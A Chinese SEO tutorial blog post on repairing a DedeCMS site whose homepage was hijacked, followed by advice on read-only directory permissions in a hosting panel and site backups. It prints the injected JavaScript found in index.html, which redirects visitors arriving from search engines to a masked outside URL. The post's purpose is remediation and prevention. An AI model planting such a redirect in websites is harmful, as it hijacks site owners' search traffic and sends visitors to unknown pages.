seo教程百科网 - 轻松零基础学seo视频教程

SEO教程百科网-杭州小周SEO优化教程学习及SEO新手培训教程

当前位置: SEO > SEO基础知识 >

织梦网站首页被劫持了怎么修复[亲测劫持恢复分享]

时间:2018-04-14 19:08来源:未知 作者:admin 点击:
网站被篡改如何修复?这是SEO站长经常遭遇的难题,网站被黑被篡改和劫持处理起来真不是件轻松的事,但也不是不可预防。 cms网站首页被劫持检查 检测网页index.html源码是否有异常。因为这个页面是最后生成的静态页,结果发现多了一段的js代码。 这个代码主要

网站被篡改如何修复?这是SEO站长经常遭遇的难题,网站被黑被篡改和劫持处理起来真不是件轻松的事,但也不是不可预防。
 

cms网站首页被劫持检查

检测网页index.html源码是否有异常。因为这个页面是最后生成的静态页,结果发现多了一段的js代码。
 

这个代码主要是用来做跳转的,打开源码,内容是:

var d=document.referrer;
if(d.indexOf("baidu")>0||d.indexOf("google")>0||d.indexOf("sogou")>0||d.indexOf("bing")>0||d.indexOf("soso")>0||d.indexOf("youdao")>0||d.indexOf("zhongsou")>0)
{window.location.href="http://www.***.com/7y/1.asp";}


他会判断是否来自搜索引擎,如果来自搜索引擎,则执行跳转命令。

 

一般网站被黑总结就以下几种:

 

网站程序版本过低,存在漏洞和BUG;

 

服务器密码过于简单,容易被扫描破解

 

空间服务商安全措施做不到位,跨站攻击

 

使用破解版的FTP软件,泄露FTP帐号信息

 

其它安全隐患

 

最为常见的是织梦CMS程序的版本漏洞,是安全隐患最为严重的重灾区。最简单的办法就是设置空间主机目录,禁止写入,只允许读取,即使有漏洞也让恶意代码无法上传和写入,可以有效的减少织梦程序被黑的风险。

 

下面来分享一个虚拟主机的安全防范小知识,本教程以景安空间为例子。

 

进入景安空间主机管理后台,找到 安全管理 – 读写权限

 

cms网站读写权限

 

在读写权限中,可以打开站点目录进行权限的设定。

 

注意事项:

 

设置只读的应用场景:防止网站因程序漏洞导致被黑客修改网站内容、挂马、挂黑链等。

 

可能带来的不利影响:如果网站需要在线上传图片、在线生成html文件等可能因此受到影响,因此需要对这些文件和目录单独开放写权限。

 

设置“只读”后,相关的目录和文件通过Web方式(网站程序)和FTP将不能改写或新建网站文件; 设

置为“可读可写”后,网站程序可以对网站中的文件进行修改、删除等操作。

 

设置后稍等片刻即生效,请根据实际情况开启或关闭只读。

 

勾选“同时应用到子目录”,目录下的所有文件和子目录都会重置权限。

 

提示:有空格或特殊字符的目录设置权限会失败,请重新命名为字母或数字格式后即可操作成功!


cms权限设置方法
 

勾选要设置权限的目录勾选 只读,同时应用到子目录,修改,保存即可。

 

 

这时候我看可以看到各个目录的权限显示为:只读  ,这些目录也就只能读取,不能写入,当然自己也无法发布内容和更新。适合长时间不更新的网站使用本方法。

 

如果自己要更新发布新内容怎么办?需要重新进入到空间管理后台,进行权限设置,恢复为可读写。

 

网站数据进行备份,确保万无一失

 

具体方法,找到文件管理,站点备份

 

站点备份很重要

 

点击网站备份,将对WEB站点所有目录进行打包压缩,可以下载到本地电脑进行保存。

 

点击云数据库备份,将对站点的数据库进行打包备份,可以下载到本地电脑进行保存。

 

电脑备份保存

 

相信做到以上两步,网站安全可以做到双重安全,从此再也不用担心网站被被恶意篡改了。

 

注意:不要直接在FTP客户端上设置,不起作用。弄好网站后,建议不定期对你正常运行的网站进行备份,这样即使被木马等程序侵入,也好我们在找不到木马文件的时候,及时的还原网站系统。
 

相关推荐:dedecms网站被镜像了怎么处理

{本文"织梦网站首页被劫持了怎么修复[亲测劫持恢复分享]" 责任编辑:小周seo顾问}
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
自学SEO入门教程咨询